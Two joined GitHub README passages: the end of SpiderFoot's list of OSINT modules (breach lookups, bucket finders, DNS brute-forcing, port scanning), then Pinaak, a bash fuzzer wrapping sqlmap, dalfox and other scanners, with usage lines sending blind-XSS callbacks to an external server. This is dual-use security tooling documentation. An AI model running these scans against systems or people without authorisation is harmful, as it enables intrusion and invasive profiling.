tutorials. ### COMMUNITY Whether you're a contributor, user or just curious about SpiderFoot and OSINT in general, we'd love to have you join our community! SpiderFoot now has a [Discord server](https://discord.gg/vyvztrG) for seeking help from the community, requesting features or just general OSINT chit-chat. ### MODULES / INTEGRATIONS SpiderFoot has over 200 modules, most of which *don't require API keys*, and many of those that do require API keys *have a free tier*. | Name | Description | Link | Type | |:---------| :-----------| :----------|:-------| AbstractAPI|Look up domain, phone and IP address information from AbstractAPI.|[https://app.abstractapi.com/](https://app.abstractapi.com/)|Tiered API abuse.ch|Check if a host/domain, IP or netblock is malicious according to abuse.ch.|[https://www.abuse.ch](https://www.abuse.ch)|Free API AbuseIPDB|Check if an IP address is malicious according to AbuseIPDB.com blacklist.|[https://www.abuseipdb.com](https://www.abuseipdb.com)|Tiered API Account Finder|Look for possible associated accounts on nearly 200 websites like Ebay, Slashdot, reddit, etc.|N/A|Internal AdBlock Check|Check if linked pages would be blocked by AdBlock Plus.|[https://adblockplus.org/](https://adblockplus.org/)|Tiered API Ahmia|Search Tor 'Ahmia' search engine for mentions of the target.|[https://ahmia.fi/](https://ahmia.fi/)|Free API AlienVault IP Reputation|Check if an IP or netblock is malicious according to the AlienVault IP Reputation database.|[https://cybersecurity.att.com/](https://cybersecurity.att.com/)|Free API AlienVault OTX|Obtain information from AlienVault Open Threat Exchange (OTX)|[https://otx.alienvault.com/](https://otx.alienvault.com/)|Tiered API Amazon S3 Bucket Finder|Search for potential Amazon S3 buckets associated with the target and attempt to list their contents.|[https://aws.amazon.com/s3/](https://aws.amazon.com/s3/)|Free API Apility|Search Apility API for IP address and domain reputation.|[https://auth0.com/signals](https://auth0.com/signals)|Tiered API Apple iTunes|Search Apple iTunes for mobile apps.|[https://itunes.apple.com/](https://itunes.apple.com/)|Internal Archive.org|Identifies historic versions of interesting files/pages from the Wayback Machine.|[https://archive.org/](https://archive.org/)|Free API ARIN|Queries ARIN registry for contact information.|[https://www.arin.net/](https://www.arin.net/)|Free API Azure Blob Finder|Search for potential Azure blobs associated with the target and attempt to list their contents.|[https://azure.microsoft.com/en-in/services/storage/blobs/](https://azure.microsoft.com/en-in/services/storage/blobs/)|Free API Bad Packets|Obtain information about any malicious activities involving IP addresses found|[https://badpackets.net](https://badpackets.net)|Commercial API Bambenek C&C List|Check if a host/domain or IP appears on Bambenek Consulting's C&C tracker lists.|[http://www.bambenekconsulting.com/](http://www.bambenekconsulting.com/)|Free API Base64 Decoder|Identify Base64-encoded strings in URLs, often revealing interesting hidden information.|N/A|Internal BGPView|Obtain network information from BGPView API.|[https://bgpview.io/](https://bgpview.io/)|Free API Binary String Extractor|Attempt to identify strings in binary content.|N/A|Internal BinaryEdge|Obtain information from BinaryEdge.io Internet scanning systems, including breaches, vulnerabilities, torrents and passive DNS.|[https://www.binaryedge.io/](https://www.binaryedge.io/)|Tiered API Bing (Shared IPs)|Search Bing for hosts sharing the same IP.|[https://www.bing.com/](https://www.bing.com/)|Tiered API Bing|Obtain information from bing to identify sub-domains and links.|[https://www.bing.com/](https://www.bing.com/)|Tiered API Bitcoin Finder|Identify bitcoin addresses in scraped webpages.|N/A|Internal Bitcoin Who's Who|Check for Bitcoin addresses against the Bitcoin Who's Who database of suspect/malicious addresses.|[https://bitcoinwhoswho.com/](https://bitcoinwhoswho.com/)|Tiered API BitcoinAbuse|Check Bitcoin addresses against the bitcoinabuse.com database of suspect/malicious addresses.|[https://www.bitcoinabuse.com/](https://www.bitcoinabuse.com/)|Free API Blockchain|Queries blockchain.info to find the balance of identified bitcoin wallet addresses.|[https://www.blockchain.com/](https://www.blockchain.com/)|Free API blocklist.de|Check if a netblock or IP is malicious according to blocklist.de.|[http://www.blocklist.de/en/index.html](http://www.blocklist.de/en/index.html)|Free API BotScout|Searches botscout.com's database of spam-bot IPs and e-mail addresses.|[http://botscout.com/](http://botscout.com/)|Tiered API botvrij.eu|Check if a domain is malicious according to botvrij.eu.|[https://botvrij.eu/](https://botvrij.eu/)|Free API BuiltWith|Query BuiltWith.com's Domain API for information about your target's web technology stack, e-mail addresses and more.|[https://builtwith.com/](https://builtwith.com/)|Tiered API C99|Queries the C99 API which offers various data (geo location, proxy detection, phone lookup, etc).|[https://api.c99.nl/](https://api.c99.nl/)|Commercial API CallerName|Lookup US phone number location and reputation information.|[http://callername.com/](http://callername.com/)|Free API Censys|Obtain information from Censys.io|[https://censys.io/](https://censys.io/)|Tiered API Certificate Transparency|Gather hostnames from historical certificates in crt.sh.|[https://crt.sh/](https://crt.sh/)|Free API CertSpotter|Gather information about SSL certificates from SSLMate CertSpotter API.|[https://sslmate.com/certspotter/](https://sslmate.com/certspotter/)|Tiered API CINS Army List|Check if a netblock or IP address is malicious according to cinsscore.com's Army List.|[https://cinsscore.com/](https://cinsscore.com/)|Free API CIRCL.LU|Obtain information from CIRCL.LU's Passive DNS and Passive SSL databases.|[https://www.circl.lu/](https://www.circl.lu/)|Free API CleanBrowsing.org|Check if a host would be blocked by CleanBrowsing.org DNS|[https://cleanbrowsing.org/](https://cleanbrowsing.org/)|Free API CleanTalk Spam List|Check if a netblock or IP address is on CleanTalk.org's spam IP list.|[https://cleantalk.org](https://cleantalk.org)|Free API Clearbit|Check for names, addresses, domains and more based on lookups of e-mail addresses on clearbit.com.|[https://clearbit.com/](https://clearbit.com/)|Tiered API CloudFlare Malware DNS|Check if a host would be blocked by CloudFlare Malware-blocking DNS|[https://www.cloudflare.com/](https://www.cloudflare.com/)|Free API CoinBlocker Lists|Check if a host/domain or IP appears on CoinBlocker lists.|[https://zerodot1.gitlab.io/CoinBlockerListsWeb/](https://zerodot1.gitlab.io/CoinBlockerListsWeb/)|Free API CommonCrawl|Searches for URLs found through CommonCrawl.org.|[http://commoncrawl.org/](http://commoncrawl.org/)|Free API Comodo|Check if a host would be blocked by Comodo DNS|[https://www.comodo.com/secure-dns/](https://www.comodo.com/secure-dns/)|Free API Company Name Extractor|Identify company names in any obtained data.|N/A|Internal Cookie Extractor|Extract Cookies from HTTP headers.|N/A|Internal Country Name Extractor|Identify country names in any obtained data.|N/A|Internal Credit Card Number Extractor|Identify Credit Card Numbers in any data|N/A|Internal Crobat API|Search Crobat API for subdomains.|[https://sonar.omnisint.io/](https://sonar.omnisint.io/)|Free API Cross-Referencer|Identify whether other domains are associated ('Affiliates') of the target by looking for links back to the target site(s).|N/A|Internal CRXcavator|Search CRXcavator for Chrome extensions.|[https://crxcavator.io/](https://crxcavator.io/)|Free API Custom Threat Feed|Check if a host/domain, netblock, ASN or IP is malicious according to your custom feed.|N/A|Internal cybercrime-tracker.net|Check if a host/domain or IP is malicious according to cybercrime-tracker.net.|[http://cybercrime-tracker.net/](http://cybercrime-tracker.net/)|Free API Darksearch|Search the Darksearch.io Tor search engine for mentions of the target domain.|[https://darksearch.io/](https://darksearch.io/)|Free API Debounce|Check whether an email is disposable|[https://debounce.io/](https://debounce.io/)|Free API Dehashed|Gather breach data from Dehashed API.|[https://www.dehashed.com/](https://www.dehashed.com/)|Commercial API Digital Ocean Space Finder|Search for potential Digital Ocean Spaces associated with the target and attempt to list their contents.|[https://www.digitalocean.com/products/spaces/](https://www.digitalocean.com/products/spaces/)|Free API DNS Brute-forcer|Attempts to identify hostnames through brute-forcing common names and iterations.|N/A|Internal DNS Common SRV|Attempts to identify hostnames through brute-forcing common DNS SRV records.|N/A|Internal DNS Look-aside|Attempt to reverse-resolve the IP addresses next to your target to see if they are related.|N/A|Internal DNS Raw Records|Retrieves raw DNS records such as MX, TXT and others.|N/A|Internal DNS Resolver|Resolves Hosts and IP Addresses identified, also extracted from raw content.|N/A|Internal DNS Zone Transfer|Attempts to perform a full DNS zone transfer.|N/A|Internal DNSDB|Query FarSight's DNSDB for historical and passive DNS data.|[https://www.farsightsecurity.com](https://www.farsightsecurity.com)|Tiered API DNSDumpster|Passive subdomain enumeration using HackerTarget's DNSDumpster|[https://dnsdumpster.com/](https://dnsdumpster.com/)|Free API DNSGrep|Obtain Passive DNS information from Rapid7 Sonar Project using DNSGrep API.|[https://opendata.rapid7.com/](https://opendata.rapid7.com/)|Free API DroneBL|Query the DroneBL database for open relays, open proxies, vulnerable servers, etc.|[https://dronebl.org/](https://dronebl.org/)|Free API DuckDuckGo|Query DuckDuckGo's API for descriptive information about your target.|[https://duckduckgo.com/](https://duckduckgo.com/)|Free API E-Mail Address Extractor|Identify e-mail addresses in any obtained data.|N/A|Internal EmailCrawlr|Search EmailCrawlr for email addresses and phone numbers associated with a domain.|[https://emailcrawlr.com/](https://emailcrawlr.com/)|Tiered API EmailFormat|Look up e-mail addresses on email-format.com.|[https://www.email-format.com/](https://www.email-format.com/)|Free API EmailRep|Search EmailRep.io for email address reputation.|[https://emailrep.io/](https://emailrep.io/)|Tiered API Emerging Threats|Check if a netblock or IP is malicious according to emergingthreats.net.|[https://rules.emergingthreats.net/](https://rules.emergingthreats.net/)|Free API Error String Extractor|Identify common error messages in content like SQL errors, etc.|N/A|Internal Ethereum Address Extractor|Identify ethereum addresses in scraped webpages.|N/A|Internal Etherscan|Queries etherscan.io to find the balance of identified ethereum wallet addresses.|[https://etherscan.io](https://etherscan.io)|Free API F-Secure Riddler.io|Obtain network information from F-Secure Riddler.io API.|[https://riddler.io/](https://riddler.io/)|Commercial API File Metadata Extractor|Extracts meta data from documents and images.|N/A|Internal Flickr|Search Flickr for domains, URLs and emails related to the specified domain.|[https://www.flickr.com/](https://www.flickr.com/)|Free API FortiGuard Antispam|Check if an IP address is malicious according to FortiGuard Antispam.|[https://www.fortiguard.com/](https://www.fortiguard.com/)|Free API Fraudguard|Obtain threat information from Fraudguard.io|[https://fraudguard.io/](https://fraudguard.io/)|Tiered API Fringe Project|Obtain network information from Fringe Project API.|[https://fringeproject.com/](https://fringeproject.com/)|Free API FullContact|Gather domain and e-mail information from FullContact.com API.|[https://www.fullcontact.com](https://www.fullcontact.com)|Tiered API Github|Identify associated public code repositories on Github.|[https://github.com/](https://github.com/)|Free API GLEIF|Look up company information from Global Legal Entity Identifier Foundation (GLEIF).|[https://search.gleif.org/](https://search.gleif.org/)|Tiered API Google Maps|Identifies potential physical addresses and latitude/longitude coordinates.|[https://cloud.google.com/maps-platform/](https://cloud.google.com/maps-platform/)|Tiered API Google Object Storage Finder|Search for potential Google Object Storage buckets associated with the target and attempt to list their contents.|[https://cloud.google.com/storage](https://cloud.google.com/storage)|Free API Google SafeBrowsing|Check if the URL is included on any of the Safe Browsing lists.|[https://developers.google.com/safe-browsing/v4/lookup-api](https://developers.google.com/safe-browsing/v4/lookup-api)|Free API Google|Obtain information from the Google Custom Search API to identify sub-domains and links.|[https://developers.google.com/custom-search](https://developers.google.com/custom-search)|Tiered API Gravatar|Retrieve user information from Gravatar API.|[https://secure.gravatar.com/](https://secure.gravatar.com/)|Free API Grayhat Warfare|Find bucket names matching the keyword extracted from a domain from Grayhat API.|[https://buckets.grayhatwarfare.com/](https://buckets.grayhatwarfare.com/)|Tiered API Greensnow|Check if a netblock or IP address is malicious according to greensnow.co.|[https://greensnow.co/](https://greensnow.co/)|Free API grep.app|Search grep.app API for links and emails related to the specified domain.|[https://grep.app/](https://grep.app/)|Free API Greynoise|Obtain information from Greynoise.io's Enterprise API.|[https://greynoise.io/](https://greynoise.io/)|Tiered API HackerOne (Unofficial)|Check external vulnerability scanning/reporting service h1.nobbd.de to see if the target is listed.|[http://www.nobbd.de/](http://www.nobbd.de/)|Free API HackerTarget|Search HackerTarget.com for hosts sharing the same IP.|[https://hackertarget.com/](https://hackertarget.com/)|Free API Hash Extractor|Identify MD5 and SHA hashes in web content, files and more.|N/A|Internal HaveIBeenPwned|Check HaveIBeenPwned.com for hacked e-mail addresses identified in breaches.|[https://haveibeenpwned.com/](https://haveibeenpwned.com/)|Commercial API Honeypot Checker|Query the projecthoneypot.org database for entries.|[https://www.projecthoneypot.org/](https://www.projecthoneypot.org/)|Free API Host.io|Obtain information about domain names from host.io.|[https://host.io](https://host.io)|Tiered API Hosting Provider Identifier|Find out if any IP addresses identified fall within known 3rd party hosting ranges, e.g. Amazon, Azure, etc.|N/A|Internal Human Name Extractor|Attempt to identify human names in fetched content.|N/A|Internal Hunter.io|Check for e-mail addresses and names on hunter.io.|[https://hunter.io/](https://hunter.io/)|Tiered API Hybrid Analysis|Search Hybrid Analysis for domains and URLs related to the target.|[https://www.hybrid-analysis.com](https://www.hybrid-analysis.com)|Free API IBAN Number Extractor|Identify IBAN Numbers in any data|N/A|Internal Iknowwhatyoudownload.com|Check iknowwhatyoudownload.com for IP addresses that have been using BitTorrent.|[https://iknowwhatyoudownload.com/en/peer/](https://iknowwhatyoudownload.com/en/peer/)|Tiered API Instagram|Gather information from Instagram profiles.|[https://www.instagram.com/](https://www.instagram.com/)|Free API IntelligenceX|Obtain information from IntelligenceX about identified IP addresses, domains, e-mail addresses and phone numbers.|[https://intelx.io/](https://intelx.io/)|Tiered API Interesting File Finder|Identifies potential files of interest, e.g. office documents, zip files.|N/A|Internal Internet Storm Center|Check if an IP address is malicious according to SANS ISC.|[https://isc.sans.edu](https://isc.sans.edu)|Free API ipapi.com|Queries ipapi.com to identify geolocation of IP Addresses using ipapi.com API|[https://ipapi.com/](https://ipapi.com/)|Tiered API ipapi.co|Queries ipapi.co to identify geolocation of IP Addresses using ipapi.co API|[https://ipapi.co/](https://ipapi.co/)|Tiered API IPInfo.io|Identifies the physical location of IP addresses identified using ipinfo.io.|[https://ipinfo.io](https://ipinfo.io)|Tiered API IPQualityScore|Determine if target is malicious using IPQualityScore API|[https://www.ipqualityscore.com/](https://www.ipqualityscore.com/)|Tiered API ipregistry|Query the ipregistry.co database for reputation and geo-location.|[https://ipregistry.co/](https://ipregistry.co/)|Tiered API ipstack|Identifies the physical location of IP addresses identified using ipstack.com.|[https://ipstack.com/](https://ipstack.com/)|Tiered API JsonWHOIS.com|Search JsonWHOIS.com for WHOIS records associated with a domain.|[https://jsonwhois.com](https://jsonwhois.com)|Tiered API Junk File Finder|Looks for old/temporary and other similar files.|N/A|Internal Keybase|Obtain additional information about target username|[https://keybase.io/](https://keybase.io/)|Free API Koodous|Search Koodous for mobile apps.|[https://koodous.com/apks/](https://koodous.com/apks/)|Free API Leak-Lookup|Searches Leak-Lookup.com's database of breaches.|[https://leak-lookup.com/](https://leak-lookup.com/)|Free API LeakIX|Search LeakIX for host data leaks, open ports, software and geoip.|[https://leakix.net/](https://leakix.net/)|Free API Maltiverse|Obtain information about any malicious activities involving IP addresses|[https://maltiverse.com](https://maltiverse.com)|Free API malwaredomainlist.com|Check if a host/domain, IP or netblock is malicious according to malwaredomainlist.com.|[http://www.malwaredomainlist.com/](http://www.malwaredomainlist.com/)|Free API MalwarePatrol|Searches malwarepatrol.net's database of malicious URLs/IPs.|[https://www.malwarepatrol.net/](https://www.malwarepatrol.net/)|Tiered API MetaDefender|Search MetaDefender API for IP address and domain IP reputation.|[https://metadefender.opswat.com/](https://metadefender.opswat.com/)|Tiered API Mnemonic PassiveDNS|Obtain Passive DNS information from PassiveDNS.mnemonic.no.|[https://www.mnemonic.no](https://www.mnemonic.no)|Free API multiproxy.org Open Proxies|Check if an IP address is an open proxy according to multiproxy.org open proxy list.|[https://multiproxy.org/](https://multiproxy.org/)|Free API MySpace|Gather username and location from MySpace.com profiles.|[https://myspace.com/](https://myspace.com/)|Free API NameAPI|Check whether an email is disposable|[https://www.nameapi.org/](https://www.nameapi.org/)|Tiered API NetworksDB|Search NetworksDB.io API for IP address and domain information.|[https://networksdb.io/](https://networksdb.io/)|Tiered API NeutrinoAPI|Search NeutrinoAPI for IP address info and check IP reputation.|[https://www.neutrinoapi.com/](https://www.neutrinoapi.com/)|Tiered API numverify|Lookup phone number location and carrier information from numverify.com.|[http://numverify.com/](http://numverify.com/)|Tiered API Onion.link|Search Tor 'Onion City' search engine for mentions of the target domain using Google Custom Search.|[https://onion.link/](https://onion.link/)|Free API Onionsearchengine.com|Search Tor onionsearchengine.com for mentions of the target domain.|[https://as.onionsearchengine.com](https://as.onionsearchengine.com)|Free API Onyphe|Check Onyphe data (threat list, geo-location, pastries, vulnerabilities) about a given IP.|[https://www.onyphe.io](https://www.onyphe.io)|Tiered API Open Bug Bounty|Check external vulnerability scanning/reporting service openbugbounty.org to see if the target is listed.|[https://www.openbugbounty.org/](https://www.openbugbounty.org/)|Free API Open Passive DNS Database|Obtain passive DNS information from pdns.daloo.de Open passive DNS database.|[http://pdns.daloo.de/](http://pdns.daloo.de/)|Free API OpenCorporates|Look up company information from OpenCorporates.|[https://opencorporates.com](https://opencorporates.com)|Tiered API OpenDNS|Check if a host would be blocked by OpenDNS DNS|[https://www.opendns.com/](https://www.opendns.com/)|Free API OpenPhish|Check if a host/domain is malicious according to OpenPhish.com.|[https://openphish.com/](https://openphish.com/)|Free API OpenStreetMap|Retrieves latitude/longitude coordinates for physical addresses from OpenStreetMap API.|[https://www.openstreetmap.org/](https://www.openstreetmap.org/)|Free API Page Information|Obtain information about web pages (do they take passwords, do they contain forms, etc.)|N/A|Internal PasteBin|PasteBin search (via Google Search API) to identify related content.|[https://pastebin.com/](https://pastebin.com/)|Tiered API PGP Key Servers|Look up e-mail addresses in PGP public key servers.|N/A|Internal PhishStats|Determine if an IP Address is malicious|[https://phishstats.info/](https://phishstats.info/)|Free API PhishTank|Check if a host/domain is malicious according to PhishTank.|[https://phishtank.com/](https://phishtank.com/)|Free API Phone Number Extractor|Identify phone numbers in scraped webpages.|N/A|Internal Port Scanner - TCP|Scans for commonly open TCP ports on Internet-facing systems.|N/A|Internal ProjectDiscovery Chaos|Search for hosts/subdomains using chaos.projectdiscovery.io|[https://chaos.projectdiscovery.io](https://chaos.projectdiscovery.io)|Commercial API Psbdmp|Check psbdmp.cc (PasteBin Dump) for potentially hacked e-mails and domains.|[https://psbdmp.cc/](https://psbdmp.cc/)|Free API Pulsedive|Obtain information from Pulsedive's API.|[https://pulsedive.com/](https://pulsedive.com/)|Tiered API PunkSpider|Check the QOMPLX punkspider.io service to see if the target is listed as vulnerable.|[https://punkspider.io/](https://punkspider.io/)|Free API Quad9|Check if a host would be blocked by Quad9|[https://quad9.net/](https://quad9.net/)|Free API Recon.dev|Search Recon.dev for subdomains.|[https://recon.dev](https://recon.dev)|Internal ReverseWhois|Reverse Whois lookups using reversewhois.io.|[https://www.reversewhois.io/](https://www.reversewhois.io/)|Free API RIPE|Queries the RIPE registry (includes ARIN data) to identify netblocks and other info.|[https://www.ripe.net/](https://www.ripe.net/)|Free API RiskIQ|Obtain information from RiskIQ's (formerly PassiveTotal) Passive DNS and Passive SSL databases.|[https://community.riskiq.com/](https://community.riskiq.com/)|Tiered API Robtex|Search Robtex.com for hosts sharing the same IP.|[https://www.robtex.com/](https://www.robtex.com/)|Free API Scylla|Gather breach data from Scylla API.|[https://scylla.so/](https://scylla.so/)|Free API searchcode|Search searchcode for code repositories mentioning the target domain.|[https://searchcode.com/](https://searchcode.com/)|Free API SecurityTrails|Obtain Passive DNS and other information from SecurityTrails|[https://securitytrails.com/](https://securitytrails.com/)|Tiered API Seon|Queries seon.io to gather intelligence about IP Addresses, email addresses, and phone numbers|[https://seon.io/](https://seon.io/)|Commercial API SHODAN|Obtain information from SHODAN about identified IP addresses.|[https://www.shodan.io/](https://www.shodan.io/)|Tiered API Similar Domain Finder|Search various sources to identify similar looking domain names, for instance squatted domains.|N/A|Internal Skymem|Look up e-mail addresses on Skymem.|[http://www.skymem.info/](http://www.skymem.info/)|Free API SlideShare|Gather name and location from SlideShare profiles.|[https://www.slideshare.net](https://www.slideshare.net)|Free API Snov|Gather available email IDs from identified domains|[https://snov.io/](https://snov.io/)|Tiered API Social Links|Queries SocialLinks.io to gather intelligence from social media platforms and dark web.|[https://sociallinks.io/](https://sociallinks.io/)|Commercial API Social Media Profile Finder|Tries to discover the social media profiles for human names identified.|[https://developers.google.com/custom-search](https://developers.google.com/custom-search)|Tiered API Social Network Identifier|Identify presence on social media networks such as LinkedIn, Twitter and others.|N/A|Internal SORBS|Query the SORBS database for open relays, open proxies, vulnerable servers, etc.|[http://www.sorbs.net/](http://www.sorbs.net/)|Free API SpamCop|Query various spamcop databases for open relays, open proxies, vulnerable servers, etc.|[https://www.spamcop.net/](https://www.spamcop.net/)|Free API Spamhaus|Query the Spamhaus databases for open relays, open proxies, vulnerable servers, etc.|[https://www.spamhaus.org/](https://www.spamhaus.org/)|Free API spur.us|Obtain information about any malicious activities involving IP addresses found|[https://spur.us/](https://spur.us/)|Commercial API SpyOnWeb|Search SpyOnWeb for hosts sharing the same IP address, Google Analytics code, or Google Adsense code.|[http://spyonweb.com/](http://spyonweb.com/)|Tiered API Spyse|Search Spyse.com Internet assets registry for information about domains, IPv4 hosts, potential vulnerabilities, passive DNS, etc.|[https://spyse.com](https://spyse.com)|Tiered API SSL Certificate Analyzer|Gather information about SSL certificates used by the target's HTTPS sites.|N/A|Internal Strange Header Identifier|Obtain non-standard HTTP headers returned by web servers.|N/A|Internal Subdomain Takeover Checker|Check if affiliated subdomains are vulnerable to takeover.|N/A|Internal Sublist3r PassiveDNS|Passive subdomain enumeration using Sublist3r's API|[https://api.sublist3r.com](https://api.sublist3r.com)|Free API Talos Intelligence|Check if a netblock or IP address is malicious according to TalosIntelligence.|[https://talosintelligence.com/](https://talosintelligence.com/)|Free API TextMagic|Obtain phone number type from TextMagic API|[https://www.textmagic.com/](https://www.textmagic.com/)|Tiered API ThreatCrowd|Obtain information from ThreatCrowd about identified IP addresses, domains and e-mail addresses.|[https://www.threatcrowd.org](https://www.threatcrowd.org)|Free API ThreatMiner|Obtain information from ThreatMiner's database for passive DNS and threat intelligence.|[https://www.threatminer.org/](https://www.threatminer.org/)|Free API TLD Searcher|Search all Internet TLDs for domains with the same name as the target (this can be very slow.)|N/A|Internal Tool - CMSeeK|Identify what Content Management System (CMS) might be used.|[https://github.com/Tuhinshubhra/CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)|Tool Tool - DNSTwist|Identify bit-squatting, typo and other similar domains to the target using a local DNSTwist installation.|[https://github.com/elceef/dnstwist](https://github.com/elceef/dnstwist)|Tool Tool - Nmap|Identify what Operating System might be used.|[https://nmap.org/](https://nmap.org/)|Tool Tool - WhatWeb|Identify what software is in use on the specified website.|[https://github.com/urbanadventurer/whatweb](https://github.com/urbanadventurer/whatweb)|Tool TOR Exit Nodes|Check if an IP adddress or netblock appears on the torproject.org exit node list.|N/A|Internal TORCH|Search Tor 'TORCH' search engine for mentions of the target domain.|[https://torchsearch.wordpress.com/](https://torchsearch.wordpress.com/)|Free API Trashpanda|Queries Trashpanda to gather intelligence about mentions of target in pastesites|[https://got-hacked.wtf](https://got-hacked.wtf)|Tiered API Trumail|Check whether an email is disposable|[https://trumail.io/](https://trumail.io/)|Free API Twilio|Obtain information from Twilio about phone numbers. Ensure you have the Caller Name add-on installed in Twilio.|[https://www.twilio.com/](https://www.twilio.com/)|Tiered API Twitter|Gather name and location from Twitter profiles.|[https://twitter.com/](https://twitter.com/)|Free API UCEPROTECT|Query the UCEPROTECT databases for open relays, open proxies, vulnerable servers, etc.|[http://www.uceprotect.net/](http://www.uceprotect.net/)|Free API URLScan.io|Search URLScan.io cache for domain information.|[https://urlscan.io/](https://urlscan.io/)|Free API Venmo|Gather user information from Venmo API.|[https://venmo.com/](https://venmo.com/)|Free API ViewDNS.info|Reverse Whois lookups using ViewDNS.info.|[https://viewdns.info/](https://viewdns.info/)|Tiered API VirusTotal|Obtain information from VirusTotal about identified IP addresses.|[https://www.virustotal.com/](https://www.virustotal.com/)|Tiered API VoIP Blacklist (VoIPBL)|Check if an IP address or netblock is malicious according to VoIP Blacklist (VoIPBL).|[https://voipbl.org/](https://voipbl.org/)|Free API VXVault.net|Check if a domain or IP address is malicious according to VXVault.net.|[http://vxvault.net/](http://vxvault.net/)|Free API Web Analytics Extractor|Identify web analytics IDs in scraped webpages and DNS TXT records.|N/A|Internal Web Framework Identifier|Identify the usage of popular web frameworks like jQuery, YUI and others.|N/A|Internal Web Server Identifier|Obtain web server banners to identify versions of web servers being used.|N/A|Internal Web Spider|Spidering of web-pages to extract content for searching.|N/A|Internal WhatCMS|Check web technology using WhatCMS.org API.|[https://whatcms.org/](https://whatcms.org/)|Tiered API Whoisology|Reverse Whois lookups using Whoisology.com.|[https://whoisology.com/](https://whoisology.com/)|Commercial API Whois|Perform a WHOIS look-up on domain names and owned netblocks.|N/A|Internal Whoxy|Reverse Whois lookups using Whoxy.com.|[https://www.whoxy.com/](https://www.whoxy.com/)|Commercial API WiGLE|Query WiGLE to identify nearby WiFi access points.|[https://wigle.net/](https://wigle.net/)|Free API Wikileaks|Search Wikileaks for mentions of domain names and e-mail addresses.|[https://wikileaks.org/](https://wikileaks.org/)|Free API Wikipedia Edits|Identify edits to Wikipedia articles made from a given IP address or username.|[https://www.wikipedia.org/](https://www.wikipedia.org/)|Free API XForce Exchange|Obtain IP reputation and passive DNS information from IBM X-Force Exchange|[https://exchange.xforce.ibmcloud.com/](https://exchange.xforce.ibmcloud.com/)|Tiered API Yandex DNS|Check if a host would be blocked by Yandex DNS|[https://yandex.com/](https://yandex.com/)|Free API Zetalytics|Query the Zetalytics database for hosts on your target domain(s).|[https://zetalytics.com/](https://zetalytics.com/)|Tiered API Zone-H Defacement Check|Check if a hostname/domain appears on the zone-h.org 'special defacements' RSS feed.|[https://zone-h.org/](https://zone-h.org/)|Free API ### DOCUMENTATION Read more at the [project website](https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQv&s=os_gh), including more complete documentation, blog posts with tutorials/guides, plus information about [SpiderFoot HX](https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQvaHgvCg==&s=os_gh). Latest updates announced on [Twitter](https://twitter.com/spiderfoot).
<h1 align="center"> <br> <a href="https://github.com/R0X4R/Pinaak/"><img src="images/logo.png" width="500px" alt="Pinaak"></a> </h1> <h4 align="center"> A vulnerability fuzzing tool written in bash, it contains most commonly used tools to perform vulnerability scans. </h4> <p align="center"> <a href="#"><img src="https://madewithlove.org.in/badge.svg"></a> <a href="https://github.com/R0X4R/Pinaak/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a> <a href="https://github.com/R0X4R/Pinaak/blob/master/LICENSE"><img src="https://img.shields.io/badge/License-MIT-yellow.svg"></a> <a href="https://ko-fi.com/i/II3I44SJV0"><img src="https://img.shields.io/badge/buy%20me%20a%20ko--fi%20-donate-red"></a> <a href="#"><img src="https://img.shields.io/badge/Made%20with-Bash-1f425f.svg"></a> <a href="https://twitter.com/R0X4R/"><img src="https://img.shields.io/badge/twitter-%40R0X4R-blue.svg"></a> <a href="https://github.com/R0X4R?tab=followers"><img src="https://img.shields.io/badge/github-%40R0X4R-orange"></a> </p> --- A bash script that automatically finds vulnerable paramters on the basis of their patterns and run some most common used tools to find various vulnerabilities and it also uses nuclei which helps to find vulnerabilities on the basis of templates. Overall it helps you to find low hanging bugs. <p align="center"> <a href="https://asciinema.org/a/wrbONQQbFkH6q2oGF5M6HWzcY?speed=8" target="_blank"><img src="https://asciinema.org/a/wrbONQQbFkH6q2oGF5M6HWzcY.svg"/></a><br> </p> <p align="center"> <a href="https://github.com/sqlmapproject/sqlmap">sqlmap</a> • <a href="https://github.com/1ndianl33t/Gf-Patterns">gf patterns</a> • <a href="https://github.com/defparam/smuggler">smuggler</a> • <a href="https://github.com/devanshbatham/OpenRedireX">OpenRedireX</a> • <a href="https://github.com/Emoe/kxss">kxss</a> • <a href="https://github.com/tomnomnom/qsreplace">qsreplace</a> • <a href="https://github.com/projectdiscovery/nuclei">nuclei</a> • <a href="https://github.com/hahwul/dalfox">dalfox</a> • <a href="https://github.com/tomnomnom/anew">anew</a> • <a href="https://github.com/projectdiscovery/notify">notify</a> • <a href="https://github.com/ameenmaali/urldedupe">urldedupe</a> • <a href="https://github.com/bp0lr/gauplus">gauplus</a> • <a href="https://github.com/dwisiswant0/crlfuzz">crlfuzz</a> • <a href="https://github.com/ffuf/ffuf">ffuf</a> </p> ### Installation **Requirements: python3 and go-lang** ```js runscan:~ sudo apt-get update runscan:~ sudo apt-get install python3.8 python3-pip runscan:~ sudo apt-get install golang-go ``` **Make sure you're root before performing the installation** ```bash runscan:~ git clone https://github.com/R0X4R/Pinaak.git && cd Pinaak/ && chmod +x pinaak install.sh && mv pinaak /usr/bin/ && ./install.sh ``` If you get any error just copy the error and search on google this will make your debugging skills better ;) **Important** (add these before using the tool you can do it by: ``sudo nano /usr/bin/pinaak``) ```js header="" # please add custom header before using pinaak intServer="" # please add interactsh server before using pinaak (http://test.interact.sh/) ``` ### Usage *Please use VPS because it makes a lot of traffic* ```js runscan:~ ./pinaak -h █▀█ █ █▄░█ ▄▀█ ▄▀█ █▄▀ █▀▀ █ █░▀█ █▀█ █▀█ █░█ coded by @R0X4R in INDIA Usage: ./pinaak [options] [targetlist] -l List of targets [must have webprobed earlier] (subfinder -d target.com | httpx -silent | anew targets.txt) -b Add your xss server for Blind XSS finding [-b https://test.xss.ht] (you can get it from https://xsshunter.com/) -t Number of threads [-t int] (default 100) Example: ./pinaak -l [targetlist] -t [threads] -b [blind xss server] ``` ```js runscan:~ subfinder -d target.com -all -threads 200 -silent | httpx -silent -threads 300 | anew -q targets.txt runscan:~ pinaak -l ~/targets.txt -t 200 -b https://test.xss.ht ``` <p align="left"> <h3>Donate</h3> <a href="https://ko-fi.com/Q5Q54SJQR"><img src="https://ko-fi.com/img/githubbutton_sm.svg"></a> </p> ### Thanks to the authors of the tools used in this script. [@tomnomnom](https://github.com/tomnomnom) [@hahwul](https://github.com/hahwul) [@projectdiscovery](https://github.com/projectdiscovery) 